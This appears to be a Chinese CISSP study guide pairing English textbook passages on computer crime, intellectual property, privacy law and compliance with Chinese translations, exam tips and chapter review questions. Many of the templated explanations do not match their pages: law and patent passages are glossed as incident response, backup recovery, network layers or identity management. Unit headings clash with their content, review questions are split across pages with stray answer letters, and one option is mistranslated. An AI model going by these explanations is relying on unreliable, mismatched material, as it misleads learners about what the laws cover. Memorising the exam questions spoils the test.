学习必备 理解刑法、民法和行政法之间的区别。 刑法保护社会免受违反我们所信奉的基本 原则的行为侵害。 刑法的违反行为由联邦和州政府提起公诉。 民法为个人之间或 个人与组织之间的纠纷和商业交易提供框架。 民法的违反行为由相关双方诉诸法 院并进行辩论。 行政法用于政府机构有效开展日常事务。

小白解释

场景先行:你是公司的安全负责人,正在读第 314 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 43 / PDF P315

第 315 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Be able to explain the basic provisions of the major laws designed to protect society against computer crime. The Computer Fraud and Abuse Act (as amended) protects computers used by the government or in interstate commerce from a variety of abuses. The Electronic Communications Privacy Act (ECPA) makes it a crime to invade the electronic privacy of an individual. Know the differences among copyrights, trademarks, patents, and trade secrets. Copyrights protect original works of authorship, such as books, articles, poems, and songs. Trademarks are names, slogans, and logos that identify a company, product, or service. Patents provide protection to the creators of new inventions.

Trade secret law protects the operating secrets of a firm. Be able to explain the basic provisions of the Digital Millennium Copyright Act of 1998. The Digital Millennium Copyright Act prohibits the circumvention of copy protection mechanisms placed in digital media and limits the liability of Internet service providers for the activities of their users. Know the basic provisions of the Economic Espionage Act of 1996. The Economic Espionage Act provides penalties for individuals found guilty of the theft of trade secrets. Harsher penalties apply when the individual knows that the information will benefit a foreign government. Understand the various types of software license agreements.

Perpetual licenses allow indefinite use after a onetime fee, while subscription licenses are time-bound with recurring fees. Open source licenses offer usage freedom with conditions, and enterprise agreements provide licenses for large organizations. EULAs define user rights and restrictions, concurrent licenses set simultaneous user limits, and named user licenses tie to specific users. Click-through agreements require active consent during installation, and cloud service licenses pertain to online services, with terms presented upon registration. Understand the notification requirements placed on organizations that experience a data breach.

California's SB 1386 implemented the first statewide requirement to notify individuals of a breach of their personal information. All other states eventually followed suit with similar laws. Currently, federal law only requires the notification of individuals when a HIPAA-covered entity breaches their protected health information.

中文直译 / 整理

能够解释旨在保护社会免受计算机犯罪侵害的主要法律的基本条款。 《计算机欺 诈与滥用法》(经修订)保护政府或用于州际贸易的计算机免受各种滥用行为。 《电子通信隐私法》(ECPA)规定,侵犯个人电子隐私属于犯罪行为。 了解版权、商标、专利和商业秘密之间的区别。 版权保护原创作品,如书籍、 文章、诗歌和歌曲。 商标是用于识别公司、产品或服务的名称、标语和标志。 专 利为新发明的创造者提供保护。 商业秘密法保护企业的经营机密。 能够解释1998年《数字千年版权法》的基本条款。 《数字千年版权法》禁止规 避数字媒体中设置的版权保护机制,并限制互联网服务提供商对其用户行为的责 任。 了解1996年《经济间谍法》的基本条款。 《经济间谍法》对被认定窃取商业秘密 的个人处以处罚。 当个人明知该信息将使外国政府受益时,将适用更严厉的处罚。 了解各种软件许可协议类型。 永久许可在一次性付费后允许无限期使用,而订阅许可则有时间限制并需定期 付费。 开源许可在特定条件下提供使用自由,企业协议则为大型组织提供许可。 最终用户许可协议(EULA)定义了用户的权利和限制,并发许可设定了同时使 用用户的上限,命名用户许可与特定用户绑定。

点击同意协议要求在安装过程 中主动确认,云服务许可涉及在线服务,其条款在注册时提供。 了解发生数据泄露的组织所面临的通知要求。 加利福尼亚州的SB 1386法案首次 实施了强制通知个人其个人信息被泄露的要求。 随后,其他各州也相继出台了 类似法律。 目前,联邦法律仅要求在受HIPAA约束的实体泄露其受保护的健康 信息时通知个人。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 315 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 44 / PDF P316

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Understand the major laws that govern privacy of personal information in the United States, the European Union, Canada, China, and South Africa. The United States has a number of privacy laws that affect the government's use of information as well as the use of information by specific industries, such as financial services companies and healthcare organizations that handle sensitive information. The EU has a more comprehensive General Data Protection Regulation that governs the use and exchange of personal information. In Canada, the Personal Information Protection and Electronic Documents Act (PIPEDA) governs the use of personal information.

China includes privacy protections in the Personal Information Protection Law (PIPL), while South Africa's are embedded in the Protection of Personal Information Act (POPIA). Explain the importance of a well-rounded compliance program. Most organizations are subject to a wide variety of legal and regulatory requirements related to information security. Building a compliance program ensures that you become and remain compliant with these often overlapping requirements. Know how to incorporate security into the procurement and vendor governance process.

The expanded use of cloud services by many organizations requires added attention to conducting reviews of information security controls during the vendor selection process and as part of ongoing vendor governance. Be able to determine compliance and other requirements for information protection. Cybersecurity professionals must be able to analyze a situation and determine what jurisdictions and laws apply. They must be able to identify relevant contractual, legal, regulatory, and industry standards and interpret them for their given situation. Know legal and regulatory issues and how they pertain to information security.

Understand the concepts of cybercrime and data breaches and be able to apply them in your environment when incidents arise. Understand what licensing and intellectual property protections apply to your organization's data and your obligations when encountering data belonging to other organizations. Understand the privacy and export control issues associated with transferring information across international borders. Written Lab

中文直译 / 整理

了解美国、欧盟、加拿大、中国和南非管理个人隐私的主要法律。 美国拥有多 项隐私法律,规范政府使用信息以及特定行业(如金融服务业和处理敏感信息的 医疗保健组织)使用信息的行为。 欧盟则制定了更全面的《通用数据保护条例》 (GDPR),规范个人数据的使用与交换。 在加拿大,《个人信息保护与电子文 档法案》(PIPEDA)规范个人信息的使用。 中国在《个人信息保护法》( PIPL)中纳入了隐私保护条款,而南非的隐私保护则体现在《个人信息保护法 案》(POPIA)中。 解释一个全面的合规计划的重要性。 大多数组织都受到与信息安全相关的广泛 法律和监管要求的约束。 建立合规计划可确保您能够并持续符合这些常常重叠 的要求。 了解如何将安全措施融入采购和供应商治理流程。 许多组织对云服务的广泛使用, 要求在供应商选择过程中以及作为持续供应商治理的一部分,加强对信息安全控 制的审查。 能够确定信息保护的合规性及其他要求。 信息安全专业人员必须能够分析情况, 并确定适用的司法管辖区和法律法规。 他们必须能够识别相关的合同、法律、 监管和行业标准,并根据具体情况加以解读。 了解法律和监管问题及其与信息安全的相关性。

理解网络犯罪和数据泄露的概 念,并在发生事件时能够在您的环境中加以应用。 了解适用于您组织数据的许 可和知识产权保护措施,以及在遇到其他组织数据时的义务。 了解跨境传输信 息时涉及的隐私和出口管制问题。 实验写作

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
标准 标准给出必须满足的最低要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 45 / PDF P317

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

1. What are the two primary mechanisms that an organization may use to share information outside the European Union under the terms of GDPR? 2. What are some common questions that organizations should ask when considering outsourcing information storage, processing, or transmission? 3. What are some common steps that employers can take to notify employees of system monitoring? Review Questions 1. Brianna is working with a U.S. software firm that uses encryption in its products and plans to export their product outside of the United States. What federal government agency has the authority to regulate the export of encryption software? A. NSA B. NIST C. BIS D. FTC 2.

Wendy recently accepted a position as a senior cybersecurity administrator at a U.S. government agency and is concerned about the legal requirements affecting her new position. Which law governs information security operations at federal agencies? A. FISMA B. FERPA C. CFAA D. ECPA 3. What type of law does not require an act of Congress to implement at the federal level but rather is enacted by the executive branch in the form of regulations, policies, and procedures? A. Criminal law B. Common law 1.

中文直译 / 整理

根据GDPR的规定,组织可以使用哪两种主要机制向欧洲联盟以外的地 区共享信息? 2. 组织在考虑外包信息存储、处理或传输时,应提出哪些常见问题? 3. 雇主可以采取哪些常见步骤来通知员工系统监控的情况? 复习问题 1. Brianna 正在为一家美国软件公司工作,该公司在其产品中使用加密技术, 并计划将产品出口到美国境外。 哪一家联邦政府机构有权监管加密软件的出 口? A. NSA B. NIST C. BIS D. FTC 2. 温迪最近接受了一家美国政府机构高级网络安全管理员的职位,她担心 这会影响她的新职位的法律要求。 哪部法律规范联邦机构的信息安全操作? A. FISMA B. FERPA C. CFAA D. ECPA 3. 什么类型的法律在联邦层面不需要国会立法即可实施,而是由行政分支以 法规、政策和程序的形式颁布? A. 刑法 B. 普通法

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 46 / PDF P318

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

C. Civil law D. Administrative law 4. What U.S. state was the first to pass a comprehensive privacy law modeled after the requirements of the European Union's General Data Protection Regulation? A. California B. New York C. Vermont D. Texas 5. Congress passed CALEA in 1994, requiring that what type of organizations cooperate with law enforcement investigations? A. Financial institutions B. Communications carriers C. Healthcare organizations D. Websites 6. What law protects the right of citizens to privacy by placing restrictions on the authority granted to government agencies to search private residences and facilities? A. Privacy Act B. Fourth Amendment C. Second Amendment D.

Gramm–Leach–Bliley Act 7. Matthew recently authored an innovative algorithm for solving a mathematical problem, and he wants to share it with the world. However, prior to publishing the software code in a technical journal, he wants to obtain some sort of intellectual property (IP) protection. Which type of protection is best suited to his needs? A. Copyright B. Trademark C. Patent C.

中文直译 / 整理

民法 D. 行政法 4. 哪个美国州第一个通过了以欧盟《通用数据保护条例》要求为模型的综 合性隐私法? A. 加利福尼亚州 B. 纽约州 C. 佛蒙特州 D. 德克萨斯 州 5. 国会于1994年通过了CALEA,要求何种类型的组织配合执法调查? A. 金融机构 B. 通信运营商 C. 医疗机构 D. 网站 6. 哪项法律通过限制政府机构搜查私人住宅和设施的权力,来保护公民的 隐私权? A. 隐私法 B. 第四修正案 C. 第二修正案 D. 格拉姆‑里奇‑比利雷法案 7. 马修最近发明了一种解决数学问题的创新算法,他希望与世界分享。 然而,在将软件代码发布到技术期刊之前,他希望获得某种形式的知识产 权(IP)保护。 哪种类型的保护最符合他的需求? A. 版权 B. 商标 C. 专利

小白解释

场景先行:你是公司的安全负责人,正在读第 318 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 47 / PDF P319

第 319 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

D. Trade secret 8. Mary is the cofounder of Acme Widgets, a manufacturing firm. Together with her partner, Joe, she has developed a special oil that will dramatically improve the widget manufacturing process. To keep the formula secret, Mary and Joe plan to make large quantities of the oil by themselves in the plant after the other workers have left. They want to protect this formula for as long as possible. What type of intellectual property (IP) protection best suits their needs? A. Copyright B. Trademark C. Patent D. Trade secret 9. Richard recently developed a great name for a new product that he plans to begin using immediately.

He spoke with his attorney and filed the appropriate application to protect his product name but has not yet received a response from the government regarding his application. He wants to begin using the name immediately. What symbol should he use next to the name to indicate its protected status? A. © B. ® C. ™ D. † 10. Tom is an adviser to a federal government agency that collects personal information from constituents. He would like to facilitate a research relationship between that firm that involves the sharing of personal information with several universities.

What law prevents government agencies from disclosing personal information that an individual supplies to the government under protected circumstances? A. Privacy Act B. Electronic Communications Privacy Act C. Health Insurance Portability and Accountability Act D. Gramm–Leach–Bliley Act D.

中文直译 / 整理

商业秘密 8. 玛丽是Acme Widgets公司的联合创始人,这是一家制造公司。 她与合作 伙伴乔共同开发了一种特殊油料,可显著改善 Widgets 的制造过程。 为保 守该配方的秘密,玛丽和乔计划在其他工人离开后,自行在工厂内大量生产 这种油料。 他们希望尽可能长期地保护这一配方。 哪种类型的知识产权( IP)保护最符合他们的需求? A. 版权 B. 商标 C. 专利 D. 商业秘密 9. 理查德最近为他计划立即开始使用的新产品想出了一个好名字。 他咨询了 律师并提交了适当的应用以保护该产品名称,但尚未收到政府对其申请的回 复。 他希望立即使用该名称。 他应在名称旁边使用什么符号来表明其受保护 状态? A. © B. ® C. 商标 D. † 10. 汤姆是联邦政府机构的顾问,该机构从选民处收集个人信息。 他希望促 进该机构与几所大学之间涉及共享个人信息的研究合作关系。 哪部法律禁止 政府机构披露个人在受保护情况下提供给政府的个人信息? A. 隐私法 B. 电子通信隐私法 C. 健康保险可携性和责任法案 D. 格拉姆‑里奇‑比利雷法案

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

问责性:问责性要求能把行为绑定到具体主体。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 319 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

问责依赖识别、认证、授权、审计和记账共同工作。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
问责性 问责性要求能把行为绑定到具体主体。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 48 / PDF P320

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

11. Renee's organization is establishing a partnership with a firm located in France that will involve the exchange of personal information. Her partners in France want to ensure that the transfer will be compliant with the GDPR. What mechanism would be most appropriate? A. Binding corporate rules B. Privacy Shield C. Privacy Lock D. Standard contractual clauses 12. The Children's Online Privacy Protection Act (COPPA) was designed to protect the privacy of children using the Internet. What is the minimum age a child must be before companies can collect personal identifying information from them without parental consent? A. 13 B. 14 C. 15 D. 16 13.

Kevin is assessing his organization's obligations under state data breach notification laws. Which one of the following pieces of information would generally not be covered by a data breach notification law when it appears in conjunction with a person's name? A. Social Security number B. Driver's license number C. Credit card number D. Student identification number 14. Roger is the CISO at a healthcare organization covered under HIPAA. He would like to enter into a partnership with a vendor who will manage some of the organization's data. As part of the relationship, the vendor will have access to protected health information (PHI).

Under what circumstances is this arrangement permissible under HIPAA? A. This is permissible if the service provider is certified by the Department of Health and Human Services. 11.

中文直译 / 整理

琳妮的组织正与一家位于法国的公司建立合作伙伴关系,该合作将涉及 个人数据的交换。 她的法国合作伙伴希望确保该数据传输符合GDPR。 最合 适的机制是什么? A. 具有约束力的公司规则 B. 隐私盾 C. 隐私锁 D. 标准合同条款 12. 儿童在线隐私保护法(COPPA)旨在保护使用互联网的儿童的隐私。 在 企业可以收集个人身份信息之前,儿童的最低年龄是多少? 在未经父母同意的情况下获取他们的信息? A. 13 B. 14 C. 15 D. 16 13. 凯文正在评估其组织在州数据泄露通知法下的义务。 当以下哪项信息与个 人姓名一起出现时,通常不会被数据泄露通知法涵盖? A. 社会保障号码 B. 驾驶证号码 C. 信用卡号码 D. 学生证号码 14. Roger 是一家受 HIPAA 约束的医疗保健组织的首席信息安全官(CISO)。 他希望与一家供应商建立合作关系,由该供应商管理组织的部分数据。 作为 合作关系的一部分,供应商将访问受保护的健康信息(PHI)。 在何种情况 下,这种安排符合 HIPAA 的规定? A. 如果服务提供商获得卫生与公众服务部认证,则此安排是允许 的。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 49 / PDF P321

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

B. This is permissible if the service provider enters into a business associate agreement. C. This is permissible if the service provider is within the same state as Roger's organization. D. This is not permissible under any circumstances. 15. Frances learned that a user in her organization recently signed up for a cloud service without the knowledge of her supervisor and is storing corporate information in that service. Which one of the following statements is correct? A. If the user did not sign a written contract, the organization has no obligation to the service provider. B. The user most likely agreed to a click-through license agreement binding the organization. C.

The user's actions likely violate federal law. D. The user's actions likely violate state law. 16. Greg recently accepted a position as the cybersecurity compliance officer with a privately held bank. What law most directly impacts the manner in which his organization handles personal information? A. HIPAA B. GLBA C. SOX D. FISMA 17. Ruth recently obtained a utility patent covering a new invention that she created. How long will she retain legal protection for her invention? A. 14 years from the application date B. 14 years from the date the patent is granted C. 20 years from the application date D. 20 years from the date the patent is granted 18.

Ryan is reviewing the terms of a proposed vendor agreement between the financial institution where he works and a cloud service provider. Which one of the following items should represent the least concern to Ryan? B.

中文直译 / 整理

如果服务提供商签订业务伙伴协议,则允许这样做。 C. 如果服务提供商与罗杰的组织位于同一州,则允许这样做。 D. 在任何情况下都不允许这样做。 15. 弗朗西斯了解到,她组织中的一名用户在主管不知情的情况下注册了一 项云服务,并将公司信息存储在该服务中。 以下哪一项陈述是正确的? A. 如果该用户未签署书面合同,则组织对服务提供商没有任何义务。 B. 该用户很可能同意了具有约束力的点击式许可协议,该协议适用于组 织。 C. 用户的行为可能违反联邦法律。 D. 用户的行为可能违反州法律。 16. 格雷格最近接受了一家私营银行的网络安全合规官职位。 哪部法律最直接 地影响其组织处理个人信息的方式? A. HIPAA B. GLBA C. SOX D. FISMA 17. 罗丝最近获得了一项涵盖她所创造的新发明的实用专利。 她将为她的发明获 得多长时间的法律保护? A. 从申请日起14年 B. 从专利授予日起14年 C. 从申请日起20年 D. 从专利授予日起20年 18. Ryan 正在审查他所在金融机构与云服务提供商之间拟议的供应商协议条 款。 以下哪一项应是 Ryan 最不关心的? 最少

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 50 / PDF P322

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

A. What security audits does the vendor perform? B. What provisions are in place to protect the confidentiality, integrity, and availability of data? C. Is the vendor compliant with HIPAA? D. What encryption algorithms and key lengths are used? 19. Justin is a cybersecurity consultant working with a retailer on the design of their new point-of-sale (POS) system. What compliance obligation relates to the processing of credit card information that might take place through this system? A. SOX B. HIPAA C. PCI DSS D. FERPA 20. Leonard and Sheldon recently coauthored a paper describing a new superfluid vacuum theory. How long will the copyright on their paper last? A. 70 years after publication B.

70 years after completion of the first draft C. 70 years after the death of the first author D. 70 years after the death of the last author A.

中文直译 / 整理

供应商执行哪些安全审计? B. 采取了哪些措施来保护数据的机密性、完整性和可用性? C. 供应商是否符合HIPAA? D. 使用了哪些加密算法和密钥长度? 19. Justin 是一位网络安全顾问,正在为一家零售商设计其新的销售点( POS)系统。 与该系统可能处理的信用卡信息相关的合规义务是什么? A. SOX B. HIPAA C. PCI DSS D. FERPA 20. 莱纳德和谢尔顿最近共同撰写了一篇论文,描述了一种新的超流体真 空理论。 他们的论文版权将持续多久? A. 发表后70年 B. 完成初稿后70年 C. 第一位作者去世后70年 D. 最后一位作者去世后70年

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
